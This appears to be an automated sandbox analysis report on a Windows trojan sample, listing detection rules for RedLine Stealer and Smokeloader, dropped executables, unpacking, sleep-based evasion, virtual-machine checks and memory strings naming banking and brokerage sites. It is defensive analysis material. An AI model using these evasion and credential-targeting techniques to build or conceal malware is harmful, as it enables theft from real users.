Source: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: J18zxRjOes.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 628E.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/7@2/3

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_005F07A6 CreateToolhelp32Snapshot,Module32First,

0_2_005F07A6

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Code function: 3_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043D0D0

Source: C:\Users\user\Desktop\J18zxRjOes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1036

Source: C:\Users\user\Desktop\J18zxRjOes.exe

File created: C:\Users\user\AppData\Local\Temp\628E.tmp

Jump to behavior

Source: J18zxRjOes.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\J18zxRjOes.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 628E.tmp.exe, 00000003.00000003.1632508136.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631985248.0000000002E54000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: J18zxRjOes.exe	ReversingLabs: Detection: 47%
Source: J18zxRjOes.exe	Virustotal: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\J18zxRjOes.exe "C:\Users\user\Desktop\J18zxRjOes.exe"
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Process created: C:\Users\user\AppData\Local\Temp\628E.tmp.exe "C:\Users\user\AppData\Local\Temp\628E.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1796
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Process created: C:\Users\user\AppData\Local\Temp\628E.tmp.exe "C:\Users\user\AppData\Local\Temp\628E.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Unpacked PE file: 0.2.J18zxRjOes.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Unpacked PE file: 3.2.628E.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Unpacked PE file: 0.2.J18zxRjOes.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Unpacked PE file: 3.2.628E.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F339D push 00000003h; ret	0_2_005F33A1
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F15F2 push es; iretd	0_2_005F1603
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F59AA pushad ; ret	0_2_005F59C6
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F5B28 push ecx; ret	0_2_005F5B45
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_005F2EFC pushad ; ret	0_2_005F2F24
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_006409CD push ecx; ret	0_2_006409E0
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0066799F push esp; retf	0_2_006679A7
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00669DE8 pushad ; retf	0_2_00669DEF
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0066DDDE push dword ptr [esp+ecx-75h]; iretd	0_2_0066DDE2
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0064CE18 push ss; retf	0_2_0064CE1D
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_0063FFF3 push ecx; ret	0_2_00640006
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00667F9D push esp; retf	0_2_00667F9E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_004499A1 push esp; ret	3_2_004499A2
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_0044AAD0 push ecx; retn 0041h	3_2_0044AAD5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020A2361 push 00000004h; ret	3_2_020A2375
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020A30C7 push 0F56897Eh; iretd	3_2_020A30DF
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020A646F push ebp; ret	3_2_020A6470
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_020A3CDA push esi; retn 001Ch	3_2_020A3CDE
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 3_2_02101A8C pushad ; retf 0044h	3_2_02101A93

Source: J18zxRjOes.exe	Static PE information: section name: .text entropy: 7.875959849695945
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.828452580141766
Source: 628E.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.828452580141766

Source: C:\Users\user\Desktop\J18zxRjOes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\J18zxRjOes.exe	File created: C:\Users\user\AppData\Local\Temp\628E.tmp.exe			Jump to dropped file

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Window / User API: threadDelayed 3075			Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Window / User API: threadDelayed 6908			Jump to behavior

Source: C:\Users\user\Desktop\J18zxRjOes.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-65597

Source: C:\Users\user\Desktop\J18zxRjOes.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\J18zxRjOes.exe TID: 3892	Thread sleep count: 3075 > 30	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe TID: 3892	Thread sleep time: -2220150s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe TID: 3892	Thread sleep count: 6908 > 30	Jump to behavior
Source: C:\Users\user\Desktop\J18zxRjOes.exe TID: 3892	Thread sleep time: -4987576s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe TID: 1796	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00668C59 FindFirstFileExW,		0_2_00668C59

Source: 628E.tmp.exe, 00000003.00000003.1643499493.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW qt%SystemRoot%\system32\mswsock.dll<
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 628E.tmp.exe, 00000003.00000003.1643742176.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
